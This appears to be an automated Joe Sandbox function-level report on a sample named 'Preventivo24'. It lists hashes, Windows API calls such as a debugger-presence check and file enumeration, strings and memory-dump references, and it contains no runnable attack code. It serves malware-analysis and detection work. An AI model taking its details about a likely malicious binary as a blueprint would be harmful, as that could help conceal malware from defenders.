Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Find$AllocateCloseFileFirstHeap
String ID: %d.%d.%d.%d
API String ID: 1673784098-3491811756
Opcode ID: 95e604a9db67d8f0af94cf7af5d81ca3c21b01d5cd4cf8c66809030d91d34100
Instruction ID: 34e8a60c20c19a23e322440c2b5c86852999d9ca26e94bf4a32a13abb8727b52
Opcode Fuzzy Hash: 95e604a9db67d8f0af94cf7af5d81ca3c21b01d5cd4cf8c66809030d91d34100
Instruction Fuzzy Hash: 75718D35905219DFDF24EF28C849BADBBB4AF44314F1082D9E919AB391DB359E84CF80

Uniqueness

Uniqueness Score: -1.00%

Function 00EBE4E0 Relevance: 5.4, Strings: 4, Instructions: 378COMMON

Download Yara Rule

Strings

Hide, xrefs: 00EBE5A4, 00EBE5C5
= ", xrefs: 00EBE818
Show, xrefs: 00EBE7E0
<> ", xrefs: 00EBE601

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID: <> "$ = "$Hide$Show
API String ID: 0-289022205
Opcode ID: 12df92abec72051d629e48a07d7ff6433655fe94275da2db3cffaa9df5501d1c
Instruction ID: cbf0158481508a01c1b275d0b3990784f12c1adf87b65f4fc81d79c50d3beaf7
Opcode Fuzzy Hash: 12df92abec72051d629e48a07d7ff6433655fe94275da2db3cffaa9df5501d1c
Instruction Fuzzy Hash: 40023570D00259CFDB24DF64C955BEEB7B1AF55304F1096DAE40ABB291EB706A84CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FEB480 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

GetLocaleInfoW.KERNEL32(00000000,00000002,01142730,00000000), ref: 00FEB501
GetLocaleInfoW.KERNEL32(00000000,00000002,?,-00000001,00000078,-00000001), ref: 00FEB53D

Strings

%d-%s, xrefs: 00FEB547

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: InfoLocale$HeapProcess
String ID: %d-%s
API String ID: 3246605784-1781338863
Opcode ID: d8e3566304045b4b6ada76d1708058cdf05bb4673d39b38a24cf39d2bfb56981
Instruction ID: c83db5a2b7ffb3d14072ee402cc653ec09ee8d470c350aa394f56ea8a281cfae
Opcode Fuzzy Hash: d8e3566304045b4b6ada76d1708058cdf05bb4673d39b38a24cf39d2bfb56981
Instruction Fuzzy Hash: E331BA72A04209ABDB14DF99CC4ABAEFBB5FF48724F14416DF529A7381DB756900CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00EAF180 Relevance: 5.3, Strings: 4, Instructions: 337COMMON

Download Yara Rule

Strings

OldProductCode, xrefs: 00EAF4BD, 00EAF4EF, 00EAF50F, 00EAF510
MultipleInstancesProps, xrefs: 00EAF2C0
ProductCode, xrefs: 00EAF438, 00EAF485, 00EAF486
MultipleInstances, xrefs: 00EAF1C2

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID: MultipleInstances$MultipleInstancesProps$OldProductCode$ProductCode
API String ID: 0-469785651
Opcode ID: a43a63fa3bec5ccdafb8409375f8c1aab25f8d5fb985bc4ad15e079e9b17b6eb
Instruction ID: 401f1451e8ee98b3e59408eea5fbd08648cfe6cc7a1eb51b2b165bfee3d543c8
Opcode Fuzzy Hash: a43a63fa3bec5ccdafb8409375f8c1aab25f8d5fb985bc4ad15e079e9b17b6eb
Instruction Fuzzy Hash: AEC1C036A00211CBCB18DFA8C8906BAB7B2FF5E318B145569D8167F245EB31FD46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01087833 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,01087778,0000001C,0108796D,00000000,?,?,?,?,?,?,?,01087778,00000004,011CE438,010879FD), ref: 01087844
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,01087778,00000004,011CE438,010879FD), ref: 0108785F

Strings

D, xrefs: 01087853

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 524c94240f5c45047fe8be0d2a047da58f038addaf03f70679d8bf38b793df0c
Instruction ID: 2b0ff9699314b0a91dffa2bd4707295b14007f67db4ecdbce75f944f30684809
Opcode Fuzzy Hash: 524c94240f5c45047fe8be0d2a047da58f038addaf03f70679d8bf38b793df0c
Instruction Fuzzy Hash: BA01FC326501099BDB14DE29DC05BED7FEAAFC4324F1CC174EE99D7244D634D541C680

Uniqueness

Uniqueness Score: -1.00%

Function 00E87AA0 Relevance: 4.7, APIs: 3, Instructions: 204COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 01083E62
GetVersionExW.KERNEL32(00000114), ref: 01083EB1
IsProcessorFeaturePresent.KERNEL32(00000011), ref: 01083EC9

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Version$FeaturePresentProcessor
String ID:
API String ID: 1871528217-0
Opcode ID: e72fe3828f36aa5852d8370e85f61aaa7e4503bb9f2303031d41c3280475bf6c
Instruction ID: 324f301395df14039fa1bb25642528f59f5a4c5d311024e1feee73fa5014122b
Opcode Fuzzy Hash: e72fe3828f36aa5852d8370e85f61aaa7e4503bb9f2303031d41c3280475bf6c
Instruction Fuzzy Hash: B9612971B182204BE35CDE2DDC842ABBBD5EBC9741F04463EE5E6C7281D6B8C549CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F9F570 Relevance: 4.7, APIs: 3, Instructions: 172fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,B5580983,?,?), ref: 00F9F62F
FindNextFileW.KERNEL32(000000FF,00000010), ref: 00F9F73A
FindClose.KERNEL32(000000FF), ref: 00F9F795

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 656c0d5d66a5f5d6cd7ce1a5a5ff98d4759461a54d3263a59e76007b388e84be
Instruction ID: af98c36b69987bb67fb58adde97969e80cfdc49fd52b67e639bd7b1fe93b2424
Opcode Fuzzy Hash: 656c0d5d66a5f5d6cd7ce1a5a5ff98d4759461a54d3263a59e76007b388e84be
Instruction Fuzzy Hash: 78618971E00219DFDF28EB64C899BEEBBB8EF54310F5441A9D459A3291DB701E88CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00EA2E50 Relevance: 4.6, APIs: 3, Instructions: 103COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000004), ref: 00EA2EAB
GetWindowLongW.USER32(00000004,000000FC), ref: 00EA2EC4
SetWindowLongW.USER32(00000004,000000FC,?), ref: 00EA2ED6

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 077fec39867864bf6496dd946b544c83bd457f4a092f0fdfb06530fc39ec823d
Instruction ID: 805bb438cd982b6d92b58e1a8630498212019d6aa72b8872b4dfaa2d477db20b
Opcode Fuzzy Hash: 077fec39867864bf6496dd946b544c83bd457f4a092f0fdfb06530fc39ec823d
Instruction Fuzzy Hash: 34418CB0A04616AFDB14DF69C948B5ABBB4FF09314F004268E524AB780DB76F914CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EA9070 Relevance: 4.6, APIs: 3, Instructions: 87COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(00000003,000000FC), ref: 00EA90C6
SetWindowLongW.USER32(00000003,000000FC,?), ref: 00EA90D8
DeleteCriticalSection.KERNEL32(?,B5580983,?,?,?,?,010B8014,000000FF), ref: 00EA9103

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: LongWindow$CriticalDeleteSection
String ID:
API String ID: 1978754570-0
Opcode ID: fae417559a55c0e132be682212833649503b704985fc7cfc6ca9ef058f4aaed8
Instruction ID: 994b81c2aad87418a2c20cff8790a92f0a5210a1f7e124c4ded6e5c612f09df6
Opcode Fuzzy Hash: fae417559a55c0e132be682212833649503b704985fc7cfc6ca9ef058f4aaed8
Instruction Fuzzy Hash: 5631C370A05646FFCB24DF28C848B8AFBF8FF16714F144269E464A7691D771E950CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0108F843 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0108F93B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0108F945
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0108F952

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 55d196f74205befce7ba87ed92d88d0a299a365bb64362fb457a5eb15020507b
Instruction ID: 1e46a7adedbf9cabe035e8a4517a6c9389f31d9a1d32a9f19b1d782cb1016b13
Opcode Fuzzy Hash: 55d196f74205befce7ba87ed92d88d0a299a365bb64362fb457a5eb15020507b
Instruction Fuzzy Hash: 6031C57490122DABCB61EF68D9887CCBBB8BF18314F5041EAE45CA7290E7749B858F44

Uniqueness

Uniqueness Score: -1.00%

Function 00E8A740 Relevance: 4.6, APIs: 3, Instructions: 65COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000000,00000000,B5580983,00000001,00000000,?,00000000,010B18B0,000000FF,?,00E8A6EC,?,?,?,?,?), ref: 00E8A76B
LockResource.KERNEL32(00000000,?,00E8A6EC,?,?,?,?,?,00000000,010B1F80,000000FF,?,00E8A890,?,?,?), ref: 00E8A776
SizeofResource.KERNEL32(00000000,00000000,?,00E8A6EC,?,?,?,?,?,00000000,010B1F80,000000FF,?,00E8A890,?,?), ref: 00E8A784

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 5d3640e331a6ca3e10e95a32e70caca2717fffdb007cc8dbfe48bddf6f5e135b
Instruction ID: 667ff27de2f2e2e8457bae4f1f0397289e433e4175e0552e08e3419a804ab5e7
Opcode Fuzzy Hash: 5d3640e331a6ca3e10e95a32e70caca2717fffdb007cc8dbfe48bddf6f5e135b
Instruction Fuzzy Hash: BB119436A046549BD7359F59DC85B66F7F8EB89B15F050A3BEC1EE3240EA36AC008790

Uniqueness

Uniqueness Score: -1.00%

Function 00E9ADD0 Relevance: 4.5, APIs: 3, Instructions: 28COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(0000001B,000000FC), ref: 00E9ADE9
SetWindowLongW.USER32(0000001B,000000FC,?), ref: 00E9ADF7
DestroyWindow.USER32(0000001B,?,?,?,?,?,?,?,?,?,?,?,?,80004003,?,00000000), ref: 00E9AE23

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: Window$Long$Destroy
String ID:
API String ID: 3055081903-0
Opcode ID: 0d4dcd3761c917d743fd8f11cc7e7416bb2fe608257dac4a7ffac7aeb6c89487
Instruction ID: 0a28da5e0b168f9c8fae51a5447f66d819ce3b530a785979ba997da324c35559
Opcode Fuzzy Hash: 0d4dcd3761c917d743fd8f11cc7e7416bb2fe608257dac4a7ffac7aeb6c89487
Instruction Fuzzy Hash: 4CF0303000AB11ABDB715B28ED05B937BE1BF05725F085B2DE4BA925E4DB70E880DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0102CA50 Relevance: 4.1, Strings: 3, Instructions: 314COMMON

Download Yara Rule

Strings

gfff, xrefs: 0102CB92
) AND ( , xrefs: 0102CC33
Show, xrefs: 0102CBDA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID:
String ID: ) AND ( $Show$gfff
API String ID: 0-344708357
Opcode ID: ec4dd059f6e589528059a8c5a285f24ad85bf80815783f3a6b07ee6725440685
Instruction ID: 998fef17642abdcf56d11d8803b60beb07537e65fde48109482a74d3bb95fbef
Opcode Fuzzy Hash: ec4dd059f6e589528059a8c5a285f24ad85bf80815783f3a6b07ee6725440685
Instruction Fuzzy Hash: B7D19A71904268CFEB24DF68C905BAEBBF1BF45304F1486D9D449BB281DB70AA84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FF6820 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(011D0098), ref: 00FF687F

Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455

Strings

%04d-%02d-%02d %02d-%02d-%02d, xrefs: 00FF68CD

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: HeapLocalProcessTime
String ID: %04d-%02d-%02d %02d-%02d-%02d
API String ID: 1554148984-3768011868
Opcode ID: 8231dd2e6f07ddee157aeb4943c5fc0f587bdb25c31cdde83d3d6378da9aba5d
Instruction ID: 635891135d2ac077d8a06c0503af607ddd2ad81872e5368d62aaf56291dc932d
Opcode Fuzzy Hash: 8231dd2e6f07ddee157aeb4943c5fc0f587bdb25c31cdde83d3d6378da9aba5d
Instruction Fuzzy Hash: 20218EB1D04208AFDB14DF99D941BAEFBF8EB0C710F10412AF915A3280EB745950CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0109A7D0 Relevance: 3.4, APIs: 2, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
